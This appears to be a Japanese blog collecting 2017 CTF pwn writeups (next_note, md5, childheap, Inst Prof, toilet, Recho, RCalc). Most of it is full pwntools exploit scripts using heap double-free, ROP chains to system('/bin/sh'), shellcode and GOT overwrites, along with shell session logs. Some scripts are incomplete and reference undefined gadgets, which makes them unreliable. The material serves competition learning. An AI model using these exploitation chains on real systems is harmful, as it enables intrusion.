

SECCON Beginners NEXT 2017 東京 next_note writeup


初心者で問題が解けないので、これで成長できたらいいなぁと思い参加した。 pwnableの方の講義で使われたnext_noteという問題のwriteupとなっている。




double freeできる。


double free -> fastbin dup -> fastbin attack -> stdoutのvtableを書き換え で制御を取れる。あとは適当にone-gadget-rce使った。


#!/usr/bin/env python
from pwn import *

context(os='linux', arch='amd64')
context.log_level = 'debug' # output verbose log

RHOST = ""
RPORT = 4296
LHOST = ""
LPORT = 8080

libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
elf = ELF('./next_note')

def section_addr(name, elf=elf):
    return elf.get_section_by_name(name).header['sh_addr']

conn = None
if len(sys.argv) > 1:
    if sys.argv[1] == 'r':
        conn = remote(RHOST, RPORT)
    elif sys.argv[1] == 'l':
        conn = remote(LHOST, LPORT)
    elif sys.argv[1] == 'd':
        execute = """
        # set environment LD_PRELOAD=
        b *{0}
        """.format(hex(elf.symbols['main'] if 'main' in elf.symbols.keys() else elf.entrypoint))
        conn = gdb.debug(['./next_note'], execute=execute)
    conn = process(['./next_note'])
    # conn = process(['./next_note'], env={'LD_PRELOAD': ''})

# preparing for exploitation
def add_note(size, payload):
    conn.sendlineafter('>> ', '1')
    conn.sendlineafter('length...', str(size))
    conn.sendlineafter('note', payload)
def show_note():
    conn.sendlineafter('>> ', '2')

def delete_note(idx):
    conn.sendlineafter('>> ', '3')
    conn.sendlineafter('Input id to remove...', str(idx))


add_note(0xf8, 'hoge')
add_note(0xf8, 'hoge')
conn.recvuntil('00 : ')
libc_base = u64(conn.recv(6)+'\x00\x00') - 0x3c4b78
log.info('libc_base = 0x%x', libc_base)

add_note(0x68, 'xxxx')
add_note(0x68, 'yyyy')

conn.recvuntil('00 : ')
heap_base = u64(conn.recvuntil('\n')[:-1].ljust(8, '\x00')) - 0x70
log.info('heap_base = 0x%x', heap_base)

payload = p64(libc_base + 0x3c56bd)
add_note(0x68, payload)
payload = 'z' * 8 * 3
payload += p64(libc_base + 0x4526a)
payload += 'z' * 8 * 3 
payload += p64(libc_base + 0x791e0)
add_note(0x68, payload)
add_note(0x68, 'zzzz')
payload = '\x00'*3  + p64(0x0) * 5 + p64(heap_base + 0x80)
add_note(0x68, payload)

% python exploit.py r
[*] '/lib/x86_64-linux-gnu/libc.so.6'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
[*] '/home/hama/ctf/next/next_note'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE
[+] Opening connection to on port 4296: Done
[*] Pwning
[*] libc_base = 0x7fdecdd13000
[*] heap_base = 0x979000
[*] Switching to interactive mode
...$ ls
$ cat flag

ksnctf C92 md5 writeup


ksnctf C92のwriteup公開が解禁されたようなので、唯一のpwn問題だったmd5のwriteupをあげる。 ksnctf C92の各問題は下記リンクより参照できる。

ksnctf C92


chceksecの結果を以下に載せる。SSPがないため、stackでのBOFが狙えそうである。また、Full RELROでないため、GOTの書き換えも有効である。 libcが公開されているため、address leakからのret2libcも狙える。

[*] '/home/hama/ctf/ksnctf/md5/md5'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE


ローカルで動かす際にはflag.txtが必要となる。 はじめにデータの長さを入力し、次に指定した長さ分のデータを入力できる。 入力データに対してmd5を求めて出力している。 exitを入力すると処理を終了する。

% ./md5 
Input data length: 10
Input data: aaaabbbbcc
MD5(your data): 11a7cd2ff48c01afcc65cca69ed0f886
MD5(flag): d0ac268c6f2253bda954982ef99c1295
Input data length: 4
Input data: exit
MD5(your data): f24f62eeb789199b9b2e467df3b1876b


入力できるデータの長さを指定できるが、長さに制限はない。そのため用意されているバッファよりも大きい値を指定すればBOFが起きる。 main関数の戻りアドレスをBOFで上書きし、ROPでputs(libc_start_main_got)を実行する。得られた値からlibcがマッピングされているlibc_baseが求まる。 ここまででは、address leakができただけなので、再度の攻撃を行えるように再びmain関数を実行させるようにする。 2度目の攻撃では求めたlibc_baseを用いて、__libc_systemとlibc内に存在する'/bin/sh'を用いてret2libcを行った。


#!/usr/bin/env python
from pwn import *

context(os='linux', arch='amd64')
#context.log_level = 'debug' # output verbose log

RHOST = "ksnctfc92.u1tramarine.blue"
RPORT = 55555
LHOST = ""
LPORT = 55555

elf = ELF('./md5')
def section_addr(name, elf=elf):
    return elf.get_section_by_name(name).header['sh_addr']

conn = None
if len(sys.argv) > 1:
    if sys.argv[1] == 'r':
        libc = ELF('./libc.so.6')
        conn = remote(RHOST, RPORT)
    elif sys.argv[1] == 'l':
        conn = remote(LHOST, LPORT)
    elif sys.argv[1] == 'd':
        libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
        execute = """
        # set environment LD_PRELOAD=./libc.so.6
        b *{0}
        """.format(hex(elf.symbols['main'] if 'main' in elf.symbols.keys() else elf.entrypoint))
        conn = gdb.debug(['./md5'], execute=execute)
    libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
    conn = process(['./md5'])
# conn = process(['./md5'], env={'LD_PRELOAD': './libc.so.6'})

def calc_MD5(length, payload):
    conn.sendlineafter('Input data length:', str(length))
    conn.sendlineafter('Input data:', payload)

# preparing for exploitation

libc_start_main_got = elf.got['__libc_start_main']
puts_addr = elf.symbols['puts']
main_addr = elf.symbols['main']

# 0x00400f13: pop rdi ; ret  ;  (1 found)
pop_rdi = 0x00400f13


payload = 'A' * (0x30+0x20) + p64(0x602098) + "A" * 0x20

rop = p64(pop_rdi)
rop += p64(libc_start_main_got)
rop += p64(puts_addr)
rop += p64(main_addr)
payload += rop

calc_MD5(len(payload), payload)
calc_MD5(4, 'exit')

# leak libc_base
libc_base = u64(conn.recv(6).ljust(8, '\x00') ) - libc.symbols['__libc_start_main']
log.info('libc_base = {:#x}'.format(libc_base))

payload = 'A' * (0x30+0x20) + p64(0x602099) + "A" * 0x20

rop = p64(pop_rdi)
rop += p64(libc_base + next(libc.search('/bin/sh')))
rop += p64(libc_base + libc.symbols['system'])
# rop += p64(main_addr)
payload += rop

calc_MD5(len(payload), payload)
calc_MD5(4, 'exit')

% python exploit.py r
[*] '/home/hama/ctf/ksnctf/md5/md5'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE
[*] '/home/hama/ctf/ksnctf/md5/libc.so.6'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
[+] Opening connection to ksnctfc92.u1tramarine.blue on port 55555: Done
[*] Pwning
[*] libc_base = 0x7fc9e6de7000
[*] Switching to interactive mode
 MD5(your data): f24f62eeb789199b9b2e467df3b1876b
$ ls
$ cat flag*


シェルを取ればフラグが2つ得られるお得な問題だった。 しかし、2つ目のフラグをsubmitするためには裏にいく必要があり、到達できなかったためフラグを腐らせてしまった。

SECUINSIDE CTF 2017 childheap writeup



checksec etc


% file ./childheap
./childheap: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=2464f8e250b3eeb77e11b8748417024fb1bfd49f, stripped

% checksec ./childheap
[*] '/home/hama/ctf/SECUINSIDE2017/childheap/childheap'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE



  • Allocate heapから指定したサイズ分を割りあてる。サイズには制約があり、0x1ff < size < 0x1000でなければならない。制約を満たすサイズであれば、malloc(size)が実行され取得されたメモリにサイズ分だけ書き込みが行える。malloc()で取得したメモリのポインタはたぶんスタック上でローカル変数として管理されている(この部分はバイナリを読んでいないので分からない)。2.Freeを実行すれば再度の割り当てができる。

  • Free Allocateで確保したメモリをfree()する。double freeが可能。

  • Modify 一度でもAllocateを実行すれば指定可能になる。heao上で管理されるAgeやNameを再編集できる。この管理領域を指すポインタはbssに存在している。

  • Secret 201527を入力すると実行できる機能。適当な数値をbssに保存することが可能。

% ./childheap 
-----ChildHeap 2017 in Secuinside---
1. Allocate
2. Free
3. Modify


このバイナリの特徴は、stdoutに関してはbufferingが切られているがstdinに関しては有効となっている点である。詳しいことは知らないが、ubuntu16.04(正確にはglibcに依存すると思うが)から、入出力のbufferはheapから確保される。 入力のbufferのために確保されるチャンクとAllocateで確保できるチャンクと、double freeを上手く使ってunsortedbin attackを行う。書き込む先はModify機能によって編集する先を指すポインタである。unsortedbin attackによってmain_aren内のunsortedbin周りを任意に編集できるようになる。

0x7f1ae77a7b80 <main_arena+96>: 0x7878787878787878      0x7878787878787878
0x7f1ae77a7b90 <main_arena+112>:        0x0078787878787878      0x00007f1ae77a7b88



#!/usr/bin/env python
from pwn import *

context(os='linux', arch='amd64')
context.log_level = 'debug' # output verbose log

RHOST = ""
RPORT = 31337
LHOST = ""
LPORT = 31337

# libc = ELF('./libc.so.6')
elf = ELF('./childheap')

def section_addr(name, elf=elf):
    return elf.get_section_by_name(name).header['sh_addr']

conn = None
if len(sys.argv) > 1:
    if sys.argv[1] == 'r':
        conn = remote(RHOST, RPORT)
    elif sys.argv[1] == 'l':
        conn = remote(LHOST, LPORT)
    elif sys.argv[1] == 'd':
        execute = """
        # set environment LD_PRELOAD=./libc.so.6
        b *{0}
        """.format(hex(elf.symbols['main'] if 'main' in elf.symbols.keys() else elf.entrypoint))
        conn = gdb.debug(['./childheap'], execute=execute)

    conn = process(['./childheap'])
    # conn = process(['./childheap'], env={'LD_PRELOAD': './libc.so.6'})

# preparing for exploitation

def Allocate(size, payload):
    conn.sendlineafter('> ', '1')
    conn.sendlineafter('Input size:', str(size))
    conn.sendlineafter('Input data:', payload)

def Free():
    conn.sendlineafter('> ', '2')
def Modify(payload, Flag):
    conn.sendlineafter('> ', '3')
    conn.sendlineafter('Do you want to change age (y/n)?', 'n')
    conn.sendlineafter('Input new name: ', payload)
    if Flag:
        conn.sendlineafter('Do you want to change name to new one (y/n)? ', 'y')
        conn.sendlineafter('Do you want to change name to new one (y/n)? ', 'n')

def Secret(code):
    conn.sendlineafter('> ', '201527')
    conn.sendlineafter('Input secret code:', str(code))

person_addr = 0x6020c0
read_got = 0x602038
printf_addr = 0x400750


Allocate(0xfff, 'hoge')
Modify('a'*0x8+'b'*8, True)
payload = 'x' * 8 + p64(person_addr - 0x10)
Modify(payload, True)
Allocate(0xfff, 'hoge')
payload = p64(0) + p64(0x6020b0 - 8) * 2 # fd and bk are 0x6020b0-8
Modify(payload, True)

payload = "A" * 8
payload += p64(0x602070-0x8-0x2)
Allocate(0x200, payload)

payload = p64(printf_addr)
Modify(payload, True)

libc_base = int(conn.recv(14), 16) - 0xf7230
log.info('libc_base = {:#x}'.format(libc_base))

payload = "AA" + p64(libc_base + 0x45390)
conn.recvuntil('3. Modify')
conn.sendlineafter('Do you want to change age (y/n)?', 'n')
conn.sendlineafter('Input new name: ', payload)
conn.sendlineafter('Do you want to change name to new one (y/n)? ', 'y')

# Modify(payload, True)


Google CTF 2017 Inst Prof writeup




下記のshellcodeを用いて、ROPを組んだ。それぞれ4byteになっている。 shellcode実行中のstackの先頭にはリターンアドレスがあるので、pop, pushでstackを壊さずにレジスタにテキスト領域のアドレスを格納することができる。r15は特にバイナリ中で使用してなさそうだったので選んだ。 incdecで所望のROPガジェットとなるように、オフセットを計算している。0x1000回のincまたはdecを避けるために、retですぐにリターンさせている。stack上への値の格納は、格納先をrbpからのオフセットで指定できるmovを使用した。rbxはshellcodeの実行領域を指しているので、ROP中で用いている。1度のshellcodeを4byteに収めるために、下記の中でのoffsetとvalueは1byteに制限されている。

pop r15, push r15
inc r15, ret
dec r15, ret
mov BYTE PTR [rbp + offst], value
mov  [rbp+offset], r15
mov  [rbp+offset], rbx


#!/usr/bin/env python
from pwn import *

context(os='linux', arch='amd64')
#context.log_level = 'debug' # output verbose log

RHOST = "inst-prof.ctfcompetition.com"
RPORT = 1337
LHOST = ""
LPORT = 1337

# libc = ELF('')
elf = ELF('./inst_prof')

def section_addr(name, elf=elf):
    return elf.get_section_by_name(name).header['sh_addr']

conn = None
if len(sys.argv) > 1:
    if sys.argv[1] == 'r':
        conn = remote(RHOST, RPORT)
    elif sys.argv[1] == 'l':
        conn = remote(LHOST, LPORT)
    elif sys.argv[1] == 'd':
        execute = """
        # set environment LD_PRELOAD=
        b *{0}
        """.format(hex(elf.symbols['main'] if 'main' in elf.symbols.keys() else elf.entrypoint))
        conn = gdb.debug(['./inst_prof'], execute=execute)
    conn = process(['./inst_prof'])
    # conn = process(['./inst_prof'], env={'LD_PRELOAD': ''})

# preparing for exploitation

def pop_push_r15():
    return asm('pop r15\n push r15')

def inc_r15():
    return asm('inc r15\n ret')

def dec_r15():
    return asm('dec r15\n ret')

def byte_move(offset, value):
    return asm('mov BYTE PTR [rbp+%d], %d' % (offset, value))

def byte_add(offset, value):
    return asm('add BYTE PTR [rbp+%d], %d' % (offset, value))

def reg_move(offset):
    return asm('mov  [rbp+%d], r15' % offset)



payload = ''
# alloc_page 
payload += pop_push_r15()
payload += dec_r15() * 0x128
payload += reg_move(0x10)

# pop_rsi_r15 rsi= 0x80, r15=?
payload += pop_push_r15()
payload += inc_r15() * 0xa9
payload += reg_move(0x18)

payload += byte_move(0x20 + 0, 0x80)
payload += byte_move(0x20 + 1, 0x00)

# pop rdi; ret
payload += pop_push_r15()
payload += inc_r15() * 0xab
payload += reg_move(0x30)

payload += asm('mov [rbp+0x38], rbx')

# read_n(size)
payload += pop_push_r15()
payload += dec_r15() * 0x98
payload += reg_move(0x40)

# pop rdi ; ret
payload += pop_push_r15()
payload += inc_r15() * 0xab
payload += reg_move(0x48)

payload += asm('mov [rbp+0x50], rbx')

# make_page_executable(addr)
payload += pop_push_r15()
payload += dec_r15() * 0xf8
payload += reg_move(0x58)
payload += asm('mov [rbp+0x60], rbx')

# trigger ROP
payload += pop_push_r15()
payload += inc_r15() * 0x39
payload += reg_move(0x8)

# execve('/bin/sh')
shellcode = '\x90' * 0x10
shellcode += asm(shellcraft.sh())
shellcode = shellcode.ljust(0x80, '\x90')

payload += shellcode + '\n'



python exploit.py r
[*] '/home/hama/ctf/GoogleCTF2017/InstProf/inst_prof'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      PIE enabled
[+] Opening connection to inst-prof.ctfcompetition.com on port 1337: Done
[*] Pwning
[*] Switching to interactive mode


$ cat flag.txt



FAUST CTF 2017 writeup


TokyoWesternsで参加して14161.47ptの8位だった。得点の内訳は、Attackが2412.00pt、Defenceが-651.05pt、SLAが12166.52ptだった。 自分は、8つあるサービスの1つであるtoiletのpatchとexploitをやった。toiletでflagを取られることはなかったのでpatchが完璧だったみたい。 exploitとpatchのwriteupを載せる。


Loginでの入力はfgets(stdin, name, 0x41)を使っており、0x40byteとNULLの1byteを書き込むことができる。書き込まれる先はheap上になっており、nameの直下にはFlushで使用する関数ポインタが格納されている。 しかし、name分の大きさは0x40byte分しかないので、fgetsのNULL終端で関数ポインタの下位1byteをNULLに上書きすることができる。

この状態で、関数ポインタ経由で関数を呼ぶと下記のような場所を呼ぶことができる。0x40249dでは、第一引数(rdi)にある文字列を'data/%s'に展開してopen()->read()する。バイナリをよく読んでないので詳細は分からないが、read()された文字列のポインタがnameとして設定されるので、Show current settingsでファイルの中身を読むことができる。data/配下にflagが書き込まれるので、あとはやるだけ。

gdb-peda$ x/20gx 0x606410
0x606410:       0x0000000000000000      0x0000000000000071
0x606420:       0x6161616161616161      0x6161616161616161
0x606430:       0x6161616161616161      0x6161616161616161
0x606440:       0x6161616161616161      0x6161616161616161
0x606450:       0x6161616161616161      0x6161616161616161
0x606460:       0x0000000000403000      0x0000000000000014
0x606470:       0x0000000000000000      0x0000000059288a7a
0x606480:       0x0000000065614388
gdb-peda$ x/7i 0x403000
   0x403000:    test   rdi,rdi
   0x403003:    je     0x403010
   0x403005:    sub    rsp,0x8
   0x403009:    call   0x40249d
   0x40300e:    jmp    0x403016
   0x403010:    mov    eax,0x0
   0x403015:    ret



1. Login 

8. Show Log 

5. Drop a load

7. Flush 
open(flag) -> read()が走る。

4. Show current settings


$$$$$$$$\  $$$$$$\  $$$$$$\ $$\       $$$$$$$$\ $$$$$$$$\ 
\__$$  __|$$  __$$\ \_$$  _|$$ |      $$  _____|\__$$  __| 
   $$ |   $$ /  $$ |  $$ |  $$ |      $$ |         $$ |    
   $$ |   $$ |  $$ |  $$ |  $$ |      $$$$$\       $$ |    
   $$ |   $$ |  $$ |  $$ |  $$ |      $$  __|      $$ |    
   $$ |   $$ |  $$ |  $$ |  $$ |      $$ |         $$ |    
   $$ |    $$$$$$  |$$$$$$\ $$$$$$$$\ $$$$$$$$\    $$ |    
   \__|    \______/ \______|\________|\________|   \__|    
Welcome to the our new smart toilet!
It's the best experience you'll get since your change from diaper to potty!
Try our note feature to keep track of your bowel movement!
Even better, in our next update we'll add a twitter sharing option!

1. Login 
2. Change the seat temperature 
3. Change the flush function 
4. Show current settings 
5. Drop a load 
6. Show latest notes 
7. Flush 
8. Show Log 
9. Logout 
10. Exit 

Your choice: 1

Please give me your name: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
1. Login 
2. Change the seat temperature 
3. Change the flush function 
4. Show current settings 
5. Drop a load 
6. Show latest notes 
7. Flush 
8. Show Log 
9. Logout 
10. Exit 

Your choice: 
1. Login 
2. Change the seat temperature 
3. Change the flush function 
4. Show current settings 
5. Drop a load 
6. Show latest notes 
7. Flush 
8. Show Log 
9. Logout 
10. Exit 

Your choice: 8

This is highly sensitive information and we respect your privacy!
Therefore, we anonymize the names in this log.
But be aware that we are forced by law to hand out any data in case of a government agencies request.

#=========================================  Log  ===============================================#
#====                         Name (anonymized)                        ==== | ====   Date   ====#
#========================================================================== | ==================#
#==== 72508d056b428937372e831bad23753c3ad3e1cd66cb22d1e5b347850ddce5a8 ==== | ==== 01:54:03 ====#
1. Login 
2. Change the seat temperature 
3. Change the flush function 
4. Show current settings 
5. Drop a load 
6. Show latest notes 
7. Flush 
8. Show Log 
9. Logout 
10. Exit 

Your choice: 5

Alright here we go!
Don't hold back, give me everything you got!
You've landed the jumbo! Nice work!
Your load weights 00000339g 

Please describe the consistency: aaa
Please leave a note about your gorgeous work:
1. Login 
2. Change the seat temperature 
3. Change the flush function 
4. Show current settings 
5. Drop a load 
6. Show latest notes 
7. Flush 
8. Show Log 
9. Logout 
10. Exit 

Your choice: 7

Going to flush now
Aaaand it's gone!
1. Login 
2. Change the seat temperature 
3. Change the flush function 
4. Show current settings 
5. Drop a load 
6. Show latest notes 
7. Flush 
8. Show Log 
9. Logout 
10. Exit 

Your choice: 4

ID: 954972103
Name: FAUST_WShgeNoH74XqhAAAAAByXae4mq/HQOoi
Seat temperature: 20
Max. weight: 398
Last visit: 05:18:57
1. Login 
2. Change the seat temperature 
3. Change the flush function 
4. Show current settings 
5. Drop a load 
6. Show latest notes 
7. Flush 
8. Show Log 
9. Logout 
10. Exit 

Your choice: 


fgets(stdin, name, 0x41)で1byte溢れるのが問題なので、fgets(stdin, name, 0x40)に修正した。この修正は問題なくSLAは通っていた。 適当にバイナリをvim -bで開き該当の箇所を直接書き換えてpatchを当てた。


First Solve取れそうだったけど、間に合わなかった。次はFirst Solveとりたい。 あと最近、オンラインA&Dが多い気がする。

RCTF 2017 writeup


TokyoWesternsで参加して4581ptで15位だった。自分はそのうち6問を解いて1965ptだった。 解いた問題は、Sign In、easyre、Recho、RCalc、RNote、RNote2で、そのwriteupを書いていく。

Sign In (Misc 32pt)



easyre (Revrse 153pt)

UPXで圧縮されていたので、まずは解凍した。 gdbで適当に処理を追いながら、flagらしい文字列を送信したら当たっていた。


Recho (Pwn 370pt)

はじめにsizeを指定するためのread()があり、指定したsize分だけまたread()がある。それをずっと繰り返しており、sizeの入力がなかったとき(EOFを送る)にmainの処理が終わる。 SSPがないため、BOFを起こせるが、ネットワーク越しだと一回EOFを送るとその先の入力が行えなくなる。そのため一回のROPでflagを読む必要がある。 方針は単純で、read()のGOTの値を適当に書き換えてopen()にして、open()->read()->write()を行った。

#!/usr/bin/env python
from pwn import *

context(os='linux', arch='amd64')
#context.log_level = 'debug' # output verbose log

RHOST = "recho.2017.teamrois.cn"
RPORT = 9527
LHOST = ""
LPORT = 9527

# libc = ELF('')
elf = ELF('./Recho')
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')

def section_addr(name, elf=elf):
    return elf.get_section_by_name(name).header['sh_addr']

conn = None
if len(sys.argv) > 1:
    if sys.argv[1] == 'r':
        conn = remote(RHOST, RPORT)
    elif sys.argv[1] == 'l':
        conn = remote(LHOST, LPORT)
    elif sys.argv[1] == 'd':
        execute = """
        # set environment LD_PRELOAD=
        b *{0}
        """.format(hex(elf.symbols['main'] if 'main' in elf.symbols.keys() else elf.entrypoint))
        conn = gdb.debug(['./Recho'], execute=execute)
    conn = process(['./Recho'])
    # conn = process(['./Recho'], env={'LD_PRELOAD': ''})

bufsize = 48 # without saved ebp 

write_plt = elf.symbols['write']
read_plt = elf.symbols['read']
write_got = elf.got['write']
read_got = elf.got['read']

pop_rax =  0x004006fc   #: pop rax ; ret  ;  (1 found)
pop_rdi =  0x004008a3   #: pop rdi ; ret  ;  (1 found)
pop_rdx =  0x004006fe   #: pop rdx ; ret  ;  (1 found)
pop_rsi_r15 = 0x004008a1#: pop rsi ; pop r15 ; ret  ;  (1 found)
call_rax = 0x004005b0   #: call rax ;  (1 found)
add_rdi_al = 0x0040070d #: add byte [rdi], al ; ret  ;  (1 found)

flag_addr = 0x601058

bss = 0x00601000 + 0x100

# preparing for exploitation


conn.recvuntil('Welcome to Recho server!\n')
payload = "A" * bufsize
payload += p64(1)

# modify GOT of 'read' to 'open' 
rop = ''
rop += p64(pop_rdi)
rop += p64(read_got)
rop += p64(pop_rax)
rop += p64(0xe0)    # -0x20
rop += p64(add_rdi_al)
rop += p64(pop_rdi)
rop += p64(read_got+1)
rop += p64(pop_rax)
rop += p64(0xfe)    # -2
rop += p64(add_rdi_al)

# open('flag', constants.O_RDONLY)
rop += p64(pop_rdi)
rop += p64(flag_addr)
rop += p64(pop_rsi_r15)
rop += p64(constants.O_RDONLY)
rop += p64(0x4141414142424242)
rop += p64(pop_r12_3)
rop += p64(read_got)
rop += p64(read_got)
rop += p64(read_got)
rop += p64(read_got)
rop += p64(call_r12)
rop += p64(0xdeadbeaf) * 7

# modify GOT of 'open' to 'read' 
rop += p64(pop_rdi)
rop += p64(read_got)
rop += p64(pop_rax)
rop += p64(0x20)    # -0x20
rop += p64(add_rdi_al)
rop += p64(pop_rdi)
rop += p64(read_got+1)
rop += p64(pop_rax)
rop += p64(0x2)    # -2
rop += p64(add_rdi_al)

# read(fd, bss, 0x100)
rop += p64(pop_rax)
rop += p64(read_plt)
rop += p64(pop_rdi)
rop += p64(3)
rop += p64(pop_rsi_r15)
rop += p64(bss)
rop += p64(0xdeadbeaf)
rop += p64(pop_rdx)
rop += p64(0x100)
rop += p64(call_rax)
rop += p64(0x0)

# write(stdout, bss, 0x100)
rop += p64(pop_rax)
rop += p64(write_plt)
rop += p64(pop_rdi)
rop += p64(constants.STDOUT_FILENO)
rop += p64(pop_rsi_r15)
rop += p64(bss)
rop += p64(0x11)
rop += p64(pop_rdx)
rop += p64(0x100)
rop += p64(call_rax)

payload += rop
conn.sendline(str(len(payload)).ljust(0xf, '\x00'))
% python exploit.py r
[*] '/home/hama/ctf/RCTF2017/Recho/Recho/Recho'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE
[*] '/lib/x86_64-linux-gnu/libc.so.6'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
[+] Opening connection to recho.2017.teamrois.cn on port 9527: Done
[*] Pwning
[*] Switching to interactive mode
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00[*] Closed connection to recho.2017.teamrois.cn port 9527
[*] Got EOF while reading in interactive

RCalc (Pwn 350pt)

scanf(“%s”)があり、BOFが起きる。自前のSSPが実装されているが、計算結果の保存を繰り返し行うことでcanaryを書き潰すことができるので、無いも同然。 scanfで区切られる文字に注意しながら、ROPした。

#!/usr/bin/env python
from pwn import *

context(os='linux', arch='amd64')
# context.log_level = 'debug' # output verbose log

RHOST = "rcalc.2017.teamrois.cn"
RPORT = 2333
LHOST = ""
LPORT = 2333

libc = ELF('./libc.so.6')
elf = ELF('./RCalc')

def section_addr(name, elf=elf):
    return elf.get_section_by_name(name).header['sh_addr']

conn = None
if len(sys.argv) > 1:
    if sys.argv[1] == 'r':
        conn = remote(RHOST, RPORT)
    elif sys.argv[1] == 'l':
        conn = remote(LHOST, LPORT)
    elif sys.argv[1] == 'd':
        execute = """
        # set environment LD_PRELOAD=./libc.so.6
        b *{0}
        """.format(hex(elf.symbols['main'] if 'main' in elf.symbols.keys() else elf.entrypoint))
        conn = gdb.debug(['./RCalc'], execute=execute)
    conn = process(['./RCalc'])
    # conn = process(['./RCalc'], env={'LD_PRELOAD': './libc.so.6'})

# preparing for exploitation

puts_got = elf.got['puts']
read_got = elf.got['read']
puts_offset = libc.symbols['puts']
system_offset = libc.symbols['system']
binsh_offset = next(libc.search('/bin/sh'))

leave_ret = 0x00401034  #: leave  ; ret  ;  (1 found)
csu_init1 = 0x401100    # mov rdx, r13 ; mov rsi, r14 ; mov edi, r15d ; call qword [r12+rbx*8] ;  (1 found)
csu_init2 = 0x40111a    # pop rbx ; pop rbp ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret  ;  (1 found)
pop_rdi = 0x00401123    #: pop rdi ; ret  ;  (1 found)
bss = 0x602200

def Add(int1, int2, flag):
    conn.sendlineafter('Your choice:', '1')
    conn.sendlineafter('input 2 integer: ', str(int1))
    if flag:
        conn.sendlineafter('Save the result? ', 'yes')
        conn.sendlineafter('Save the result? ', 'no')


name = 'A' * 0x108
name += p64(0x2)
name += "X" * 8

# read(stdin, bss, 0x100) and stack pivot
rop = ''
rop += p64(csu_init2)
rop += p64(0x070400)                # rbx
rop += p64(0x070400+1)              # rbp
rop += p64(0x280050)                # r12
rop += p64(0x100)                   # r13
rop += p64(bss)
rop += p64(0x0)
rop += p64(csu_init1)
rop += "Z" * 8
rop += "Z" * 8
rop += p64(bss - 8)
rop += "Z" * (8 * 4)
rop += p64(leave_ret)

payload = name + rop
conn.sendlineafter('Input your name pls: ', payload)

for i in range(0x20 + 2):
    Add(i, i, True)

Add(1, 1, True)
conn.sendlineafter('Your choice:', '5'.ljust(0xf, '\x00'))

# puts(puts_got)
rop = ''
rop += p64(csu_init2)
rop += p64(0x0)                    # rbx
rop += p64(0x1)                    # rbp
rop += p64(puts_got)                # r12
rop += p64(0xdeadbeaf)             # r13
rop += p64(0xdeadbeaf)
rop += p64(puts_got)
rop += p64(csu_init1)
rop += "Z" * 8
# read(stdin, bss+a, 0x100) and stack pivot
rop += p64(0x0)                    # rbx
rop += p64(0x1)                    # rbp
rop += p64(read_got)                # r12
rop += p64(0x100)             # r13
rop += p64(bss+0x100)
rop += p64(0)
rop += p64(csu_init1)
rop += "Z" * 8
rop += "Z" * 8
rop += p64(bss - 8 + 0x100)
rop += "Z" * (8 * 4)
rop += p64(leave_ret)

libc_base = u64(conn.recv(6).ljust(8, '\x00')) - puts_offset
log.info('libc_base = {:#x}'.format(libc_base))

rop = ''
rop += p64(pop_rdi)
rop += p64(libc_base + binsh_offset)
rop += p64(libc_base + system_offset)

% python exploit.py r
[*] '/home/hama/ctf/RCTF2017/RCalc/libc.so.6'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
[*] '/home/hama/ctf/RCTF2017/RCalc/RCalc'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE
[+] Opening connection to rcalc.2017.teamrois.cn on port 2333: Done
[*] Pwning
[*] libc_base = 0x7f9b1a4f4000
[*] Switching to interactive mode

$ cat flag

RNote (Pwn 454pt)

